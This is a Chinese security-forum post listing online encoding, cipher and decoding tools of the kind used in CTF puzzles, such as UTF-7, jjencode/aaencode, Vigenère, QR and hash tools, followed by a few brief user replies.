'+/v+'UTF-7加密:http://web2hack.org/xssee
 
各种无知密码解密:http://www.tools88.com
 
uuencode解码 && xxencode解码(古老的邮件密码):http://web.chacuo.net/charsetuuencode
 
MIME标准(邮件编码的一种):http://dogmamix.com/MimeHeadersDecoder/
 
Binhex编码(邮件编码的一种,常见于MAC机):http://encoders-decoders.online-domain-tools.com/
 
%u8001%u9525非/u的hex%u编码,只能编码汉字(xssee):http://web.chacuo.net/charsetescape
 
猪圈密码:http://www.simonsingh.net/The_Black_Chamber/pigpen.html
 
ppencode(把Perl代码转换成只有英文字母的字符串):http://namazu.org/~takesako/ppencode/demo.html
 
rrencode(把ruby代码全部转换成符号):挂了
 
aaencode(JS代码转换成常用的网络表情,也就是我们说的颜文字js加密):http://utf-8.jp/public/aaencode.html
 
'()[]!+' && '$=~[]+"_.\();'jother编码jjencode(JS代码转换成只有符号的字符串):http://web2hack.org/xssee
 
jother(是一种运用于javascript语言中利用少量字符构造精简的匿名函数方法对于字符串进行的编码方式。其中8个少量字符包括:! + ( ) [ ] { }。只用这些字符就能完成对任意字符串的编码):http://tmxk.org/jother/
 
jjencode/aaencode可用xssee && Chrome的Console模式来直接输出解密。
 
Manchester曼彻斯特解密:http://eleif.net/manchester.html
 
Vigenère维多利亚解密:https://www.guballa.de/vigenere-solver
 
Vigenère cipher:http://planetcalc.com/2468/
 
Hill cipher(希尔密码):http://planetcalc.com/3327/
 
Atbash cipher(埃特巴什码):http://planetcalc.com/4647/
 
snow(html隐写):http://fog.misty.com/perry/ccs/snow/snow/snow.html
 
Serpent加密解密:http://serpent.online-domain-tools.com/
 
十六进制Hex转文本字符串:http://www.bejson.com/convert/ox2str/
 
Hex2text:http://www.convertstring.com/EncodeDecode/HexDecode
 
Binary(二进制),ACSII,Hex(十六进制),Decimal(十进制):http://www.binaryhexconverter.com/
 
集合:http://www.qqxiuzi.cn/daohang.htm
 
集合(各种古典密码):http://rumkin.com/tools/cipher/
 
文本加密为汉字("盲文",音符,各种语言,花朵,箭头...):http://www.qqxiuzi.cn/bianma/wenbenjiami.php
 
在线繁体字转换器:http://www.aies.cn
 
在线工具集合:http://tomeko.net/online_tools/
 
二维码/条形码:https://online-barcode-reader.inliteresearch.com/
 
生成二维码:http://www.wwei.cn/
 
在线二维码解密:http://jiema.wwei.cn/
 
Image2Base64:http://www.vgot.net/test/image2base64.php
 
与佛论禅:http://www.keyfc.net/bbs/tools/tudoucode.aspx
 
在线分解GIF帧图:http://zh.bloggif.com/gif-extract
 
bejson(杂乱):http://www.bejson.com
 
atool(杂乱):http://www.atool.org
 
Punch Card:http://www.kloth.net/services/cardpunch.php
 
分解素数(ESA):http://www.factordb.com/index.php
 
文件在线Hash:http://www.atool.org/file_hash.php

[注意]传递专业知识、拓宽行业人脉——看雪讲师团队等你加入!

收藏
免费 7
支持
分享
最新回复 (4)
雪    币: 4
活跃值: (504)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
2
我自己顶一下吧
2020-9-16 20:55
0
雪    币: 739
活跃值: (1865)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
3
2020-9-17 10:07
0
雪    币: 7
能力值: ( LV1,RANK:0 )
在线值:
发帖
回帖
粉丝
4
老哥优秀!但是好多代码和结构被网页渲染给过滤了,看着贼难受
2020-9-29 09:21
0
雪    币: 20
能力值: ( LV1,RANK:0 )
在线值:
发帖
回帖
粉丝
5
优秀,
2020-10-13 10:08
0
游客
登录 | 注册 方可回帖
返回
//